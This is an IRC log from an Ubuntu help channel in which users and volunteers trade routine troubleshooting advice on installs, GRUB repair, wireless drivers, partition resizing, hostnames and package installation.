Dr_Willis_DJ_HaMsTa:  the screensaver settings and powersaver setting panels have that setting13:33
Dr_Willis_!manual | DJ_HaMsTa13:33
ubottuDJ_HaMsTa: The Ubuntu Manual will help you become familiar with everyday tasks such as surfing the web, listening to music and scanning documents. With an emphasis on easy to follow instructions, it is suitable for all levels of experience. http://ubuntu-manual.org/13:33
brickywoah you can really have fun even with shadows13:33
ravibn Hi! I installed ubuntu 10.04 LTS 64 desktop on my Dell Latitude e6510 inside windows It went dead what exactly is the problem ? how to fix ?13:34
Junikszhttp://www.pchub.cn/uph/photos/item/6318827277816462241_Siemens%20Nixdorf%20PCD-4ND.JPG this is the machine13:34
brickyim just screwing around with it now I gave up on my wifi issue13:34
Dr_Willis_ravibn:  you mean you put in the cd and installed it via the 'wubi' install method?13:34
ravibnDr_willis : yes! I did burn it on to a CD and installed inside windows 713:35
ubottuWubi is an Ubuntu installer for Windows users that allows you to install and uninstall Ubuntu like a Windows application, in a simple and safe way. http://wubi-installer.org/support.php and https://wiki.ubuntu.com/WubiGuide for troubleshooting. Please  file bugs at http://launchpad.net/wubi/+filebug.13:35
Dr_Willis_I never use wubi - so that factoid knows more then i do on 'wubi'13:36
brickyanyone know why with compiz I dont have window animations? :P13:36
ravibnDr_Willis : after a reboot it gave me list of OS and I selected the ubuntu but the machine went dead13:36
brickyravibn: it just died?13:37
ravibnyes! no response from any keys13:37
brickyjust through ubuntu right13:37
jameschhas anyone here uses netatalk for setting up a time machine backup on ubuntu?13:37
ravibnany recovery from that ? I tried to run without installing the same thing happened13:38
brickyravibn: I dunno never heard that before, you could google it and see what comes up13:38
brickyravibn: I doubt youll get that much material on it tho, kinda strange13:39
ravibnbricky : why it would not run from the cd alone  without installing ?13:39
jbowlesTried to use gpart to format external usb drive, app crashed, now crashes every time i try to start it, what's up?13:39
brickyravibn: wubi is a .exe file, not a live cd? afaik13:39
ravibnbricky : is it bcos of the nvidia chip onboard ?13:40
brickyravibn: keyboard issues? highly doubtful13:40
brickyor do you mean the screen went dead,13:40
=== kaho is now known as MMkaho
ravibnbricky : bcos the display goes blank13:40
ravibnbricky : and latter that machine13:41
MMkahoOk questions my drive is mounted on 10/04 but it dosent show up in Computer13:41
Vigojbowles: Tried fdisck or something like that yet?13:41
ravibnbricky : any quickfix solution ?13:42
brickyravibn: I dunno exactly what but someone here could tell you how to recompile xorg.conf im sure (and boot in terminal perhaps)13:42
brickythats the only thing I can think of, you gotta edit your xorg.conf , maybe reset drivers to 'generic' or whatever name they go by13:42
brickyI dont know how to do that though sorry13:42
jbowlesVigo: no, was hoping to just fix the app that i know how to use already13:43
Poul|Raideranyone who can guide me to apply this patch , a patch file, not sure where to use the patch command and file. https://sourceforge.net/tracker/?func=detail&aid=2812158&group_id=24366&atid=38134913:43
MMkahoand no dvds or cds load up13:43
Vigojbowles: That makes sense, have you fully unmounted it and tried the GParted CD?13:44
tehf0xAnyone here with an apple USB keyboard and can tell me which key is the famed 'fn' key that mods the f1-12 keys?13:45
EgyParadoxPoul|Raider: Have you tried using remmina?13:45
Poul|RaiderEgyParadox, havent tried anything, totaly lost here :)13:45
Poul|RaiderEgyParadox, just downloaded the patch file.13:46
EgyParadoxEgyParadox: You need rdesktop?13:46
MMkahoOk questions my drive is mounted on 10.04 but it dosent show up in Computer  no cds or dvds load up but it worked fine before i got to Ubuntu13:46
tic^tehf0x: apple forums?13:46
Poul|RaiderEgyParadox, i have rdesktop installed13:46
EgyParadoxOh ok.13:46
=== whiter` is now known as whiter
tehf0xtic^: well it's a key that's only called 'fn' by linux users disgruntled with the f1-12 keys :-D13:46
bazhangtehf0x command key? ie apple key?13:47
EgyParadoxPoul|Raider: you need to connect to a windows box using remote desktop?13:47
tehf0xtic^: https://help.ubuntu.com/community/AppleKeyboard13:47
tehf0xtried all the modifying keys, none seem to bring out my fn keys :-D13:47
kamil86hi guys, I connect to internet using adsl modem and I start the connection using a .sh script but it requires root privileges. How can change privileges so I won't have to always run it with sudo..13:47
ravibnbricky : can you suggest better version for my Dell Latitude e651013:48
ravibnbricky : u there ?13:48
Poul|RaiderEgyParadox, i dont have issues to connect to windows with rdesktop or tsclient. But i wanna apply the fix so it works without getting the "NOT IMPLEMENTED: IRP Query Volume Information class: 0x7"13:48
Vigojbowles: Here is one guide: http://www.mattcutts.com/blog/format-external-drive-for-linux/13:49
EgyParadoxPoul|Raider: Cant help.13:50
ben__trying to install ndisgtk, says "Cannot find package ndisgtk"?13:50
damianwould the ~/.profile run when a user logs onto the system under GNOME / KDE?13:51
damianor even the ~/.bashrc13:51
damianor do they have their own startup areas13:51
brickyravibn: im not that good with linux sorry13:51
JackWaughdamian: .bashrc runs.13:51
JackWaughdamian: oops, I could be wrong.13:51
damianthat's what i thought :P13:52
JackWaughI use Gnome.13:52
tehf0xOh hotdog totally found it, next to home and delet keys.13:52
icedwaterHello, I noticed that I can almost double my battery life by using metacity instead of compiz ... how do I set metacity as the default WM?13:52
damianafter reading, i thought that .profile runs under shell and .bashrc would run in Terminal13:52
damianbut neither would run on user login13:52
JackWaughDon't know about KDE.13:52
JackWaughdamian: .bashrc runs when I open a shell under Gnome.13:52
damianyeah, but what about when you log onto a computer?13:52
icedwaterdamian: I would have thought that that's .profile.13:53
JackWaughdamian: No, not when I log in.13:53
bastid_raZoricedwater: System > Preferences > Appearances  > Visual Effects > select None13:53
MMkahocould someone help me mount/show DVD drive in Computer13:53
damiancat ~/.profile; # ~/.profile: executed by the command interpreter for login shells.13:53
damiancat ~/.bashrc; # ~/.bashrc: executed by bash(1) for non-login shells.13:54
JackWaughdiamian: There must be some script the per/user X-related stuff runs when you start using X.13:54
damianoh, i know what i'll do13:54
damiani've been checking my ubuntu-server for scripts13:55
damiani might want to check my ubunut-desktop /etc/skel :P13:55
brickyI can't believe no tutorials work for my wifi card =13:55
damianthat probably has what i'm after, considering it uses it!13:55
MMkahoHello anybody help?13:56
brickyneed to be a genius to figure out how to install my wireless :O13:56
MMkaho it dosent show up in Computer  no cds or dvds load up but it worked fine before i got to Ubuntu13:57
JackWaughMMkaho: Does the drive show up in /media?13:57
MMkahoshows up in /dev though13:57
ben__Trying to install ndisgtk on 9.04 - says "Cannot find package"???13:57
JackWaughTry mounting it.13:57
robin0800bricky: no genius' here sorry13:57
MMkahoaccording to mtab, /dev/sr0 is already mounted on /mnt/dvd13:58
JackWaughIs it?13:58
brickyrobin8888: here either :)13:58
MMkahothats the output i get when i try to mount it13:58
neo_how can start services in ubuntu ?13:59
neo_like squid13:59
Poul|Raideranyone got an idea where i can find a channel with people able to assist me in applying a patch to rdesktop13:59
neo_service squid restart ?13:59
JackWaughMMkaho: Well, look in /mnt.13:59
EgyParadoxneo_: sudo /etc/init.d/squid restart13:59
neo_EgyParadox: thank you14:00
Picineo_: service squid restart   will work, if squid is the name of the service.14:00
MMkahoit says cddrive dvd  and dvdrive14:00
neo_thanks Pici14:00
=== neo_ is now known as ne0|penguin
JackWaughMMkaho: So, look in /mnt/dvd.14:01
JackWaughMMkaho: What is on the dvd?  An ISO file system, a movie, or what?14:01
MMkahook i see the files on the dvd14:01
madjoeHi! What's the best code editor for Ubuntu? Something like gEdit, but much better? :)14:01
MMkahoare the folders14:01
JackWaughMMkaho:  Do you want to play the movie?14:01
madjoeI need it mostly for PHP/MySQL/HTML code...14:01
Dr_Willis_madjoe:  check out geany14:02
acer_Hello folks!14:02
madjoeDr_Willis_: ok, I'll check it14:02
kamil86does anyone knows how " chmod ug +s  filename" works?14:03
acer_How do I install JDK on Lucid Lynx?14:03
JackWaughMMkaho: You need one of the tools that can play a movie.  Totem.  Maybe if you unmount the file system, Totem will know what to do with the device.14:03
ben__anyone help installing drivers for 9.04?14:03
solowUbuntu and flash don't go that well together ehg14:03
solowOr am I imagining things here14:03
ne0|penguinbazhang: sup14:03
JackWaughkamil86:  That looks like it sets the set-uid and set-gid bits.14:04
icedwaterbastid_raZor: I want some compositing, eg for transparency, but I don't really need a full-featured compiz.14:04
MMkahook well i tried to load it up in the Movie player preinstalled with this14:04
icedwaterI don't want to completely disable desktop effects, either... I think some Compiz plugins are pretty handy.14:05
kamil86JackWaugh: hi yes I'm trying to run a script with root privileges but not using sudo ..14:05
JackWaughMMkaho: Maybe your preinstalled movie player (whatever it is) will work if you unmount the FS.14:05
bazhangMMkaho, I'd try vlc to be honest14:05
bastid_raZoricedwater: use compiz and edit which plugins you wish to use with ccsm14:05
EgyParadoxacer_: sudo apt-get install openjdk-6-jdk14:05
JackWaughkamil86:  Are you asking what the effect of the set-id bits is?14:06
JackWaughkamil86:  Are you getting some kind of error message when you try to do it?14:06
kamil86JackWaugh: kind of :) I read the documentation but I can't make it work :(14:06
llutzkamil86: you cannot set suid-root on scripts14:06
JackWaughkamil86:  It's a script?14:06
kamil86JackWaugh: yes14:07
acer_EgyParadox, how about if I want to install sun-JDK?14:07
kamil86JackWaugh: to start adsl modem14:07
JackWaughkamil86:  Write a little program in C that will execute your script.14:07
Dr_Willis_kamil86:  or set up sudo where it dosent need a password to run that specific command14:07
llutzkamil86: why don't you use pppeoconf?14:07
EgyParadoxacer_: sudo apt-get install sun-java6-jdk14:07
Pici!java > acer_14:08
ubottuacer_, please see my private message14:08
zulgabani have installed ubuntu-desktop (apt-get install ubuntu-desktop) on top of ubuntu-server (10.04). how do i disable the GUI from auto-booting everytime i reboot the server?14:08
TaygunI cant get my camera working guys :S14:08
Dr_Willis_zulgaban:  disable the gdm service in /etc/init/gdm.conf  (rename it to /etc/init/gdm.DONTRUN  or similer)14:08
kamil86Dr_Willis_: is it a easy to set ?14:08
zulgabanthank you Dr_Willis14:09
Dr_Willis_kamil86:  its done via editing the sudoers file.   check the various sudo tutorials.. and backup that file befor editing it.14:09
erUSULzulgaban: edit /etc/init/gdm.conf comment out from the line that begins "start on ..." to " ... or stopped udevtrigger)) "14:09
kamil86Dr_Willis_: thanks I'll check it out14:10
llutzkamil86: why don't you use pppoeconf for your adsl connection?14:10
kamil86Dr_Willis_: is it a safe solution ?14:10
kamil86llutz: I not really familiar with it14:10
Dr_Willis_kamil86:  one of the reasons sudo was invented.. allows you do set various things like that.14:10
llutzkamil86: there should be tutorials in the forums and iirc it is the recommended way to use xdsl14:10
kamil86llutz: I think the script is using pppoe ..14:11
Dr_Willis_kamil86:  if you want it done at every bootup. You could just put the commands in /etc/rc.local also.14:11
Ta3vhey guys I forget, but what flag do I need to use to copy a directory? i did cp eggdrop/ and I got "omitting directory"14:12
llutzkamil86: pppoe is what most xdsl-connections use14:12
Ta3vI know theres a flag I need to include.14:12
llutzTa3v: cp -a or cp -r14:12
Dr_Willis_r = recursive14:12
erUSULzulgaban: or this http://serverfault.com/questions/137776/disable-gdm-in-ubuntu-10-0414:13
kamil86Dr_Willis_: you mean the script for modem ? If yes I can't because sometimes it takes too long for my pc to recognize the usb modem and it's not ready until few seconds and booting is finished by then ..14:14
zulgabannow. my next quiestion is = how do i disable the spalsh thinggy & show the details of the boot process in ubuntu 10.04 server?14:14
zulgaban*splash* thinggy14:15
peppyubuntuapprarently i liked kde4 desktop14:15
ben__help with installing ndsiwrapper on 9.04?14:15
Ta3vhey i think ive discovered a flaw, I was watching a video with DragonPlayer, and everytime Pidgin played a sound like for a buddy logging online. Dragon Player lost the video's audio feed14:15
Ta3vand nothing but killing it and restarting the program can get it working properly14:15
Ta3vi did it 3 more times to test it14:15
peppyubuntunow i want stuff from kde4 as kde is totally unstable and crashing all the time14:15
damianare any of you guys running KDE and want to come into a little test of mine?14:16
damianit'll take five minutes!14:16
Jordan_U!bugs | Ta3v14:16
ubottuTa3v: If you find a bug in Ubuntu or any of its derivatives, please file a bug using the command « ubuntu-bug <package> » - See https://help.ubuntu.com/community/ReportingBugs for other ways to report bugs - Bugs in/wishes for the IRC bots (not Ubuntu) can be filed at http://bugs.launchpad.net/ubuntu-bots14:16
peppyubuntuhow do i set paths in ubuntu for various files on my harddisk14:16
damianbut requires you to log off your user14:16
Ta3vwith out fail if you are watching something with Dragon Player, and Pidgin(perhaps any system sound) plays, you lose sound on the video feed14:16
peppyubuntulike music on e drive to be set as music folder14:16
wSogehow can I used "grub-install" from my live cd to fix my grub? I need specify something, but im scared i may install it in the wrong place.14:16
acer_thank you guys!14:17
bodzillawSoge what grub do you have14:17
iflemazulgaban  erUSUL last post will do both disable gdm on boot and display the kernel messages14:17
kamil86thanks guys I'll try sudo first as it seems the easiest solutions and later on I'll play more with pppoe14:17
scuniziwSoge: you can't really. .you can install grub on several drives if you want..14:17
AdvoWorkany reason why doing df -h would show some info, then hang, i think its a mount problem, in which case, anything I can do?14:17
Dr_Willis_AdvoWork:  i see it hang as my usb hds  spin up.. then it shows their info14:18
logyatiguys help! df -i shows / as 100% used inodes14:18
bodzillawSoge what is the actual problem and which grub version14:18
logyatihow do i clean it??14:19
wSogebodzilla the one which is installed with mint linux14:19
bodzillawsoge whats the proble14:19
wSogei somehow messed it up, and now only get grub rescue> on boot14:20
Jordan_UwSoge: Any error message before the rescue prompt?14:20
llutzlogyati: remove files, clean temporary files, move parts to other partitions ...14:21
ben__anyone help with installing ndsiwrapper?14:21
bodzillawSoge if it's grub2 it is a easy reload of the MBR and or just mounting the partition to boot we nee to figure out the version though14:21
coventry`How can I set my default window manager to sawfish?14:21
matanyawhere can I watch the World Cup without any non-free codecs?14:22
matanyameans no flash, no wmp, no h.26414:22
SlidingHornmatanya: I don't think that really qualifies as an Ubuntu support question, but I'll pm you a good spot14:22
wSogeJordan_U  I somehow destroyed my install of mint, I orignally had a dual booting win7 + winXP and then I installed Mint-linux too, grub took over. It worked fine, until I selected some kind of recovery partition causing grub to mess up. Now I am presented with "error: uknown filesystem." and "grub rescue>", anyone can help me fix it?14:22
bazhang!cn | gsin14:22
ubottugsin: For Ubuntu help in Chinese 您可以访问中文频道: #ubuntu-cn 或者 #ubuntu-tw  或者 #ubuntu-hk14:22
Dr_Willis_coventry`:  if you install sawfish with the package manager it 'should' add a sawfish entry to the GDM login screen menus14:22
Dr_Willis_matanya:  check the webupd8.org web site - they had a list of sites , or the omgubuntu website,.14:23
wSogebodzilla how would i find that out?14:23
icedwaterAh, I've found the problem... compiz.real can't find the 'animation' plugin, so it stutters at startup.14:23
Jordan_UwSoge: Can you run boot info script, http://ubuntuforums.org/showthread.php?t=1291280 , and pastebin the output?14:24
icedwaterAlso, I think quite a few plugins I wanted are missing.14:24
banker247anyone use skype?14:24
Dr_Willis_icedwater:  check package manager.. there are extra plugin packages14:24
bodzillawsoge go to the ubuntu forums and post this script in code tags http://bootinfoscript.sourceforge.net/14:24
wocaohot to upgrade to 64bits ubuntu system14:25
coventry`Dr_Willis_: Do I need to configure the login screen to use gdm?  Because despite having installed sawfish, I'm not seeing any options for setting my WM during login.14:25
bazhangwocao, full reinstall14:25
bodzillaJordan_U you got it I missed your post14:25
scuniziwocao: reinstall.. if you have a separate /home then it's pretty easy14:26
icedwaterDr_Willis_: Yep, I am just noticing compiz-plugins.14:26
ben__Anyone help install ndsiwrapper?14:26
icedwaterIt seems to be already installed, though.14:27
wocaobut i just one14:27
fatalityhi guys14:27
=== fatality is now known as Guest46547
Jordan_Ucoventry`: The option won't appear until you select a user.14:27
wocaoi just to to upgrade 64bits14:27
icerootben__: sudo apt-get install ndiswrapper14:27
coventry`Jordan_U: Once I select a user, where does the option appear?  Because I just went through the full login process, and saw no such option.14:28
bazhangwocao, from 32?14:28
andrea__ciao atutti14:28
vltHello. What's the difference between ubuntu and ubuntustudio? Can I install it with debootstrap by passing another mirror?14:28
ben__Iceroot - Couldn't find package????14:28
wocaodoes it only one way to reinstall ? have any other way?14:28
SlidingHornben__: what problem are you having?  I would check out this thread -- it's a great troubleshooter for ndiswrapper:  http://ubuntuforums.org/showthread.php?t=88584714:28
Jordan_Ucoventry`: There should be a "session" menu.14:28
Piciwocao: It requires a re-install.  You cannot upgrade from 32 to 64.14:28
Tesssajust upgraded my puter to a AMD64x6 phenom it runs fine using a nvidia 8000 series graphics board,have heard that it won't run with a 9000 series graphics board any information on that please as i intend to upgraqde the graphics board14:28
bazhangwocao, only way is to reinstall14:28
Guest46547i want to ask something  how can i install system performance monitor on the desktop???14:29
Ta3vOk Im going to attempt an experiment14:29
Ta3vive moved the directory for taeggy from my linux server to this pc14:29
Ta3vgoing to see if it works14:29
Picivlt: The difference is a different set of default packages, the repositories are the same.14:29
coventry`Jordan_U: Nope.  (This is lucid lynx, BTW.)14:29
Dr_Willis_Guest46547:  if you mean some widgit to show cpu/memory/networking speeds. theres several tools in the repos that cn show those14:29
vltPici: So both use the very same version of JACK or audacity for example?14:31
Picivlt: Same versions, just JACK gets installed by default on ubuntustudio.14:31
ben__Trying to install Ndsiwrapper, keep getting message "Could't find package ndsigtk"???14:31
bazhangben__, perhaps a typo then it's in the repos14:32
wocaobut i have not cdrom14:32
bazhangben__, it's ndisgtk14:32
wocaocan i use network  insall 64bits os14:33
bazhangwocao, use unetbootin if your computer supports boot from usb then14:33
ben__bazhang - it's on a laptop with no web, how do I add repository?14:33
bazhangben__, no ethernet cable?14:33
wocaoother question .my machine is 32 bis ,can it install 64bis ?14:34
SlidingHornben__:  ndisgtk is the graphical front-end for use with the ndiswrapper...however, aptitude/apt-get/synaptic requires an internet connection to get the files to install.  once connected, run this command to install ndisgtk sudo apt-get install ndisgtk14:34
bazhangwocao, if it has a 64bit processor sure14:34
xwolf_hi all14:34
scuniziwocao: only if it is capable of 64 bit14:35
bazhangwocao, if not, then no14:35
wocaobut i  wan to comiple chromium os o my pc14:36
Dr_Willis_wocao:  and your CPU is what? thats what is imporntant14:36
wocaoit tell me only 64 bits os14:36
bazhangwocao, no need; chromium is in the repo14:36
ben__Could not get lock /var/lib/dpkg/lock - open (11 Resource temporarily unavailable)14:36
EgyParadoxben_: Do you have synaptic open?14:37
ben__close it?14:37
scunizibazhang: chromium the OS? in the repos?  browser I know.. but the os?14:37
wise_crypt!info chromium | wocao14:37
ubottuwocao: chromium (source: chromium-bsu): transitional dummy package for chromium-bsu. In component universe, is optional. Version 0.9.14-1 (lucid), package size 13 kB, installed size 40 kB14:37
wocaochromiumos/src/scripts# ./make_chroot14:37
wocaomake_chroot: i686 is not supported as a host machine architecture.14:37
Piciwise_crypt: the package name is chromium-browser14:38
bazhangscunizi, ah the OS14:38
ben__Couldn't find package ndisgtk14:38
scuniziwocao: this is not a chromium support channel..14:38
* wise_crypt node14:38
=== TannerF|sleeping is now known as TannerF
wocaoi just want to comile chrome for ubuntu14:39
wise_cryptlots of op today :)14:39
wocaowho have14:39
SlidingHornwocao: why compile it?  it's in the repositories -- chrome *and* chromium are.14:39
asfjiohello, how can i install pg_bulkload on my ubuntu?14:39
vltIs there a way to control JACK and jackrack w/o X server?14:39
PiciSlidingHorn: He is talking about the OS, not the browser.14:39
scuniziwocao: cromium OS is it's own operating system .. if you want the browser it is pre-compiled in the repositories.. if you really want to compile it youself there's lots of docs on that14:40
ben__Egyparadox "Couldn't find package ndisgtk"14:40
wocaoi followed this14:40
SlidingHornpici: ohhhhhhhhh   sorry, I'm slow.  :-P14:40
=== isaiah__ is now known as Guest16112
wocaoi want to compile it fore my arm platfrom14:41
wocaoi want to compile it for my arm platfrom14:41
Piciwocao: It would be best to seek support in the chromium-os channel: #chromium-os14:41
SlidingHornpici & wocao: only on my 2nd cup of coffee...I'll come around eventually.  wasn't aware there was a version available...might have to run it on virtualbox to check it out14:41
Piciwocao: We cannot support another, non-ubuntu OS here.14:41
EgyParadoxben__: You need to install ndiswrapper?14:41
ben__yes - how to install from USB?14:41
wocaoyes i have no body answer me14:41
scunizi!compile | wocao14:42
ubottuwocao: Compiling software from source? Read the tips at https://help.ubuntu.com/community/CompilingSoftware (But remember to search for pre-built !packages first)14:42
Piciwocao: Then you need to be patient, not every channel is as busy as Ubuntu.14:42
ben__EgyParadox - can I pm you?14:42
Ta3vis ubuntu capable of resizing a NTFS partition?14:42
wocaoone one tell me need 64bits os14:42
vltTa3v: Yes, ntfsresize can do this14:42
Jordan_UwSoge: Are you still there?14:42
wocaoonly one tell me need 64bits os14:42
Guest16112Can i change the monitor size? how? It currently have two options - 800x600, 640x480.14:42
Ta3vI keep trying to resize a partion on /dev/sdb with GParted, I even ran the program from the console using sudo, but the resize option remains grayed out14:43
Piciwocao: We've told you what you need to do if you want a 64 bit OS.  Beyond that, we cannot help.14:43
Guest46547i want to ask something  how can i show the system screen on the desktop???14:43
thune3Guest46547: system screen?14:43
megadethI have 80GB of unallocated space. When I try to create a new partition with gparted, it says the kernel was unable to re-read the partition table14:43
scuniziTa3v: if it's mounted, unmount it.. gparted will do that in the menus I think14:44
vltTa3v: parted doesn't know how to call ntfsresize when resizing a partition. You need to do it yourself14:44
Ta3vits currently mounted14:44
Ta3vI want to resize /dev/sdb from 100/100gbs, to 50/100gbs NTFS, and an EXT4 partition for 50/100gb, and then mount that partition as say /storage14:44
wocaowho have compiled chrome for arm platform ?14:44
bazhangben__, using unetbootin14:45
Ta3vI can do this, correct?14:45
bazhangwocao, this is the wrong channel14:45
Guest16112Is there a way to expend my monitor screen size?14:45
wocaosorry ,i just to ask lists because chromium channel is not so hot14:46
bazhangwocao, its offtopic here, please don't ask here anymore.14:46
Ta3vok how do I remount /dev/sdb ?14:47
Ta3vmount -t ntfs /dev/sdb /win2  ?14:47
Jordan_U!fixres | Guest1611214:47
ubottuGuest16112: The X Window System is the part of your system that's responsible for graphical output. To restart your X, type « sudo /etc/init.d/?dm restart » in a console - To fix screen resolution or other X problems: https://wiki.ubuntu.com/X/Config/Resolution14:47
vltTa3v: looks fine14:48
robin__Does anyone know how to change back to the default plymouth theme? plymouth-set-default-theme doesnt work.14:48
llutzTa3v: are you sure its /dev/sdb (device), not a partition?14:48
Ta3vok some one name another GUI program besides GParted that can resize a partition14:50
edbianTa3v, There is a kde one I think.14:51
prithivHi cna some one help me in installing citrix14:51
fqhHI, what's the standard method to change ubuntu's hostname? I modified the file /etc/hostname, and ran a shell script with sudo ./xxx.sh, then got a additional prompt line :"sudo: unable to resolve host MY-NEW-HOSTNAME"14:51
llutz!hostname | fqh14:51
ubottufqh: Use hostname <somehostname> to set the hostname, or to do it permanently: edit /etc/hostname and /etc/hosts . WARNING! Make sure that your current hostname and /etc/hosts match, otherwise sudo may not work properly.14:51
scuniziTa3v: partitionmanager is the kde version of gparted14:51
shivyhi everyone14:52
edbianfqh, The proper thing to do is chance /etc/hostname AND use the sudo hostname <newHostname> command.  You're getting that error because of your /etc/hosts file (network resolving)14:52
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prithivHi, can some one help me out in installing citrix???14:52
prithivHi, can some one help me out in installing citrix???14:52
prithivHi, can some one help me out in installing citrix???14:52
Ta3vits telling me "Minimum size 95394 MiB Maximum Size 95394 MiB14:52
scuniziprince_jammys: it won't install on a 64 bit sys if that's what you have14:52
Ta3vit won't let me resize the partition14:52
Fitimyour boot partition is on a disk using GPT partition14:52
Fitimany help14:52
wocaoin ubuntu ,how to look up  if my cpu is 64 bits14:53
wSogehow i can i re-install grub using the liveCD? I am doing "grub-install /dev/hda" but it says permission denied, also im not sure if that is even the correct place. :s14:53
Tesssajust upgraded my puter to a AMD64x6 phenom it runs fine using a nvidia 8000 series graphics board,have heard that it won't run with a 9000 series graphics board any information on that please as i intend to upgraqde the graphics board14:53
edbianwSoge, well you'll need sudo.  I think that is correct14:53
Jordan_UwSoge: First please give us the boot info script results14:53
vltTa3v: Do you want to resize a partition or a file system?14:53
wocaoin ubuntu ,how to look up  if my cpu is 64 bits14:53
fqhedbian, ubottu: ok, I try it14:53
edbianfqh, (ubottu is not a person, it's a program ;) )14:54
Ta3vtheres only 1 partition on /dev/sdb its 100gb out of 100gb NTFS14:54
Jordan_UwSoge: http://ubuntuforums.org/showthread.php?t=129128014:54
Ta3vI want to resize that down to say 70gb14:54
logyatithere is something growing up the inodes usage so fast!14:54
Ta3vand then create an EXT4 partition14:54
edbianTa3v, Does it have a little orange triangle indicating some sort of errors on the disk?  Is the partition mounted?14:54
vltwocao: grep lm /proc/cpuinfo14:54
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Ta3vit does have a triangle14:55
Ta3vand i have to unmount it to even get the option to resize14:55
Ta3vperhaps ill run a check on it14:55
wSogeJordan_U how would i get that?14:55
Jordan_UwSoge: There are instructions here: http://ubuntuforums.org/showthread.php?t=129128014:55
Ta3vWARNING The disk has bad sector.14:56
vltTa3v: Do you want to to resize the file system too? Then you need to run ntfresize on it first.14:56
edbianTa3v, You can right click and see properties to see the errors in more detail.  I can tell you right now though that you're going to have to use chkdsk in windows.  Good idea to run it twice.14:56
emxi__it restarted, but the problem is that it the monitor size still remains the same - 800x40014:56
vltTa3v: ntfsresize, even14:56
Jordan_Uvlt: Gparted can resize ntfs just fine on its own, I don't know why you think it can't.14:56
edbianTa3v, You could also just erase the whole damn thing if you don't care about the data on it.14:56
OzzahHi, I'm having a lot of trouble installing my RAID drivers. I'm using a highpoint rocketraid 1649 and I'm running Ubuntu 10.04.14:56
Ta3vwell unfortunately I do.14:57
Ta3vI guess I'll have to run chkdsk from winders14:57
wocaocpts# grep lm /proc/cpuinfo14:57
wocaoflags           : fpu vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp lm 3dnowext 3dnow extd_apicid pni cx16 lahf_lm cmp_legacy extapic cr8_legacy 3dnowprefetch14:57
OzzahI have (finally) managed to extract the contents of the floppy image supplied on the website, but I can't seem to insmod it14:57
edbianvlt, I've never heard of that command before.  What package is it in?14:57
vltJordan_U: Ok, then it's not necessary, thanks. I recently tried but (my) parted refused to touch the fs.14:57
bastid_raZorwocao: your processor is 64bit capable14:58
llutzedbian: ntfsprogs14:58
vltedbian: ntfsprogs14:58
wSogeJordan_U I got "no such file or directory"14:58
wocaohow  do you know14:58
edbianvlt, llutz, And it allows you to resize an ntfs partition with errors?14:58
llutzedbian: idk, i don't care about ntfs14:59
wocaohow  do you know my machine is 64 bits14:59
tgywawhat is the difference between postifx   2.7.0 and 2.7.0-114:59
KaOSoFtedbian, why can't you use GParted?14:59
KaOSoFtIt's the best.14:59
edbianllutz, ha ha ha.  Why did you suggest is then?14:59
vltwocao: it is (flag lm)14:59
Jordan_UwSoge: In a terminal type "sudo bash ", then drag the script into the terminal window, then press enter to run it.15:00
llutzedbian: why do you think i did?15:00
edbianKaOSoFt, I love it!  Someone else suggested ntfsresize.15:00
KaOSoFtAnd I'm pretty sure it includes the same NTFS library as in ntfsprogs.15:00
llutzedbian: i just answered your questions what package the tools is in15:00
edbianllutz, Cool.  Too bad he left we could have told him that!  Good thing to know as well! :)15:00
struhevolhow do i reset my pannel15:00
struhevolto default15:00
edbianllutz, wait, what?  Can ntfsresize resize an ntfs partition with errors on it or not?15:00
ubottuTo reset the gnome panel to defaults, type this in a !terminal: « gconftool --recursive-unset /apps/panel && killall gnome-panel »15:00
llutzedbian: idk, i don't care about ntfs15:01
edbianllutz, ha ha.  Thanks.15:01
edbianllutz, I'll assume it will not.15:01
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p1l0tIn wine are you supposed to run the install program or just copy the .exe and .dll into the appropriate directory? #winehq is idle and the documentation didn't seem to clarify15:02
vltedbian: though there's a --force option ;-)15:03
edbianvlt, good point.  Sounds dangerous15:03
Jordan_UwSoge: I'm going to need to leave in about 10 minutes.15:03
llutzvlt: very clever to force those things. hope he has a ogod backup15:03
p1l0tUse the --force luke15:03
wSogeJordan_U ok then, what should i look for in the results?15:03
vlt(does ntfs deserve better?) *duck*15:03
patusovniak kakdea?15:03
edbianvlt, I believe his data does.  Regardless of how it's encoded on a disk.15:04
bazhang!ru | patusovniak15:04
ubottupatusovniak: Пожалуйста посетите #ubuntu-ru для получения помощи на русском языке  / Pozhalujsta posetite #ubuntu-ru dlya polucheniya pomoshi na russkom yazyke15:04
llutzedbian: who tries to resize partitions without having backed up the data ...15:05
wSogeJordan_U here is the pastebin, http://pastebin.com/6BL10up315:05
edbianI have before :P15:05
dartwhich is the best clipboard application for ubuntu?15:06
SlidingHornllutz: you'd be surprised...15:06
vlt!best | dart15:06
ubottudart: Usually, there is no single "best" application to perform a given task. It's up to you to choose, depending on your preferences, features you require, and other factors. Do NOT take polls in the channel. If you insist on getting people's opinions, ask BestBot in #ubuntu-bots.15:06
vltdart: I use klipper15:06
bastid_raZordart: tomboy15:06
darttomboy clips?15:07
edbiandart, Who's the best artist?15:07
edbiandart, it depends15:07
LantiziaAnyone ever found out how to get CC to show up in a column view on Thunderbird?15:07
llutzSlidingHorn: after nearly 30 yrs with computers, i'm not surprised on anything. crazy people doing crazy things.15:07
Jordan_UwSoge: Looks like your partition numbering changed, and /dev/sda7 became /dev/sda615:07
wSogeJordan_U so how would I fix this?15:08
wocaoi 'm downloading the 64bits15:08
sidneyfor some reason i cant set vlc as default so i want to remove movie player but it's not listed in synaptic15:08
emxi__has xorg got something to do with monitor resolutions?15:08
Jordan_UwSoge: http://grub.enbug.org/Grub2LiveCdInstallGuide should get grub working again. Make sure that when you run grub-install you point it to /dev/sda *not* to a partition /dev/sda6 .15:08
qnixhi ppl, How can I fix the bug when I start a OO presentation (slide show) and the gnome panel aren't hidden?15:09
wSogeok, i already have my mint linux live cd which i can use the grub-install command15:09
wSogeis that ok? Jordan_U?15:09
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sidneyhow do i remove this program movie player from commandline15:09
Jordan_UwSoge: You need to follow that guide to use grub-install from a liveCD, it won't work without either chrooting as explained in the link I gave or using --root-directory. I recommend chrooting.15:10
thune3tgywa: there is a patch to the release 2.7.0 which makes it 2.7.0-1 see http://de.postfix.org/ftpmirror/15:10
bastid_raZorsidney: movie player is possibly totem15:10
WXZanyone know how to add the tomboy panel without using "Add to Panel"15:11
wocaowhat 's  the difference between karmic and lucid15:11
DarkStar1An update?? :)15:12
